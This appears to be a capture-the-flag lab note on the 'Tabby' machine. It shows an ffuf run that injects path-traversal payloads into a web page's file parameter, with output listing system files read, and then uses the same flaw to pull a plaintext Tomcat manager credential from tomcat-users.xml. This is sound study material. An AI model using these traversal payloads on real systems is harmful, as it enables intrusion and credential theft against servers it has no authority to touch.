LFI

LFI is confirmed to be present in the Web application running on the target port 80 There is a system user named, ash

SSH

Unfortunately, the ash user does not a SSH key

Fuzzing

┌──(kali㉿kali)-[~/archive/htb/labs/tabby]
└─$ ffuf -c -w /usr/share/wordlists/intruder/lfi.txt -u 'http://megahosting.htb/news.php?file=../../../../FUZZ' -ic -fw 1
________________________________________________
 
 :: Method           : GET
 :: URL              : http://megahosting.htb/news.php?file=../../../../FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/intruder/lfi.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response words: 1
________________________________________________
[status: 200, Size: 246, Words: 23, Lines: 11, Duration: 198ms]
    * fuzz: /etc/hosts
 
[status: 200, Size: 473, Words: 72, Lines: 11, Duration: 100ms]
    * fuzz: /etc/fstab
 
[status: 200, Size: 7237, Words: 965, Lines: 228, Duration: 103ms]
    * fuzz: /etc/apache2/apache2.conf
 
[status: 200, Size: 1321, Words: 93, Lines: 56, Duration: 96ms]
    * fuzz: /proc/self/status
 
[status: 200, Size: 317, Words: 52, Lines: 2, Duration: 107ms]
    * fuzz: /proc/self/stat
 
[status: 200, Size: 1850, Words: 16, Lines: 36, Duration: 113ms]
    * fuzz: /etc/passwd
 
[status: 200, Size: 246, Words: 23, Lines: 11, Duration: 111ms]
    * fuzz: /etc/hosts
 
[status: 200, Size: 1040, Words: 181, Lines: 22, Duration: 97ms]
    * fuzz: /etc/crontab
 
[status: 200, Size: 24, Words: 5, Lines: 3, Duration: 172ms]
    * fuzz: /etc/issue
 
[status: 200, Size: 144, Words: 17, Lines: 2, Duration: 159ms]
    * fuzz: /proc/version
 
[status: 200, Size: 107, Words: 4, Lines: 2, Duration: 159ms]
    * fuzz: /proc/cmdline
 
[status: 200, Size: 7237, Words: 965, Lines: 228, Duration: 99ms]
    * fuzz: /etc/apache2/apache2.conf
 
[status: 200, Size: 3299, Words: 296, Lines: 125, Duration: 100ms]
    * fuzz: /etc/ssh/sshd_config
 
[status: 200, Size: 85632, Words: 16, Lines: 59, Duration: 113ms]
    * fuzz: /var/log/wtmp
 
[status: 200, Size: 85632, Words: 16, Lines: 59, Duration: 99ms]
    * fuzz: /var/log/wtmp
 
[status: 200, Size: 317, Words: 52, Lines: 2, Duration: 101ms]
    * fuzz: /proc/self/stat
 
[status: 200, Size: 1317, Words: 93, Lines: 56, Duration: 104ms]
    * fuzz: /proc/self/status
 
[status: 200, Size: 1850, Words: 16, Lines: 36, Duration: 99ms]
    * fuzz: /etc/passwd
 
[status: 200, Size: 1040, Words: 181, Lines: 22, Duration: 94ms]
    * fuzz: /etc/crontab
 
[status: 200, Size: 24, Words: 5, Lines: 3, Duration: 95ms]
    * fuzz: /etc/issue
 
[status: 200, Size: 246, Words: 23, Lines: 11, Duration: 95ms]
    * fuzz: /etc/hosts
 
[status: 200, Size: 144, Words: 17, Lines: 2, Duration: 126ms]
    * fuzz: /proc/version
 
[status: 200, Size: 107, Words: 4, Lines: 2, Duration: 126ms]
    * fuzz: /proc/cmdline
 
[status: 200, Size: 7237, Words: 965, Lines: 228, Duration: 101ms]
    * fuzz: /etc/apache2/apache2.conf
 
[status: 200, Size: 3299, Words: 296, Lines: 125, Duration: 99ms]
    * fuzz: /etc/ssh/sshd_config
 
[status: 200, Size: 317, Words: 52, Lines: 2, Duration: 97ms]
    * fuzz: /proc/self/stat
 
[status: 200, Size: 1317, Words: 93, Lines: 56, Duration: 99ms]
    * fuzz: /proc/self/status
 
[status: 200, Size: 1850, Words: 16, Lines: 36, Duration: 130ms]
    * fuzz: /etc/passwd
 
[status: 200, Size: 1850, Words: 16, Lines: 36, Duration: 106ms]
    * fuzz: /etc/passwd
 
[status: 200, Size: 246, Words: 23, Lines: 11, Duration: 98ms]
    * fuzz: /etc/hosts
 
[status: 200, Size: 24, Words: 5, Lines: 3, Duration: 100ms]
    * fuzz: /etc/issue
 
[status: 200, Size: 144, Words: 17, Lines: 2, Duration: 100ms]
    * fuzz: /proc/version
 
[status: 200, Size: 1040, Words: 181, Lines: 22, Duration: 100ms]
    * fuzz: /etc/crontab
 
[status: 200, Size: 107, Words: 4, Lines: 2, Duration: 100ms]
    * fuzz: /proc/cmdline
 
[status: 200, Size: 1850, Words: 16, Lines: 36, Duration: 102ms]
    * fuzz: /etc/passwd
 
[status: 200, Size: 7237, Words: 965, Lines: 228, Duration: 100ms]
    * fuzz: /etc/apache2/apache2.conf
 
[status: 200, Size: 3299, Words: 296, Lines: 125, Duration: 95ms]
    * fuzz: /etc/ssh/sshd_config
 
[status: 200, Size: 85632, Words: 16, Lines: 59, Duration: 168ms]
    * fuzz: /var/log/wtmp
 
[status: 200, Size: 85632, Words: 16, Lines: 59, Duration: 106ms]
    * fuzz: /var/log/wtmp
 
[status: 200, Size: 1850, Words: 16, Lines: 36, Duration: 96ms]
    * fuzz: etc%2fpasswd
 
:: Progress: [1539/1539] :: Job [1/1] :: 312 req/sec :: Duration: [0:00:04] :: Errors: 0 ::

while ffuf returned a lot of files, access and error logs for apache is nowhere to be found as i was hoping to attempt log poisoning

tomcat

A Tomcat instance is running on the web server on the port 8080

Referring back to the default installation page, it would appear that the Tomcat instance is installed to the /usr/share/tomcat9 directory

Looking further online also reveals that the tomcat-users.xml file can be located at the /usr/share/tomcat9/etc directory while it also notes that it varies between versions

The /usr/share/tomcat9/etc/tomcat-users.xml file is located via LFI The credential, tomcat:$3cureP4s5w0rd123!, is defined here with admin-gui and manager-script roles

InfoSec LAB

Explorer

Tabby_LFI

LFI

SSH

Fuzzing

tomcat

Interactive Graph View

Table of Contents

Backlinks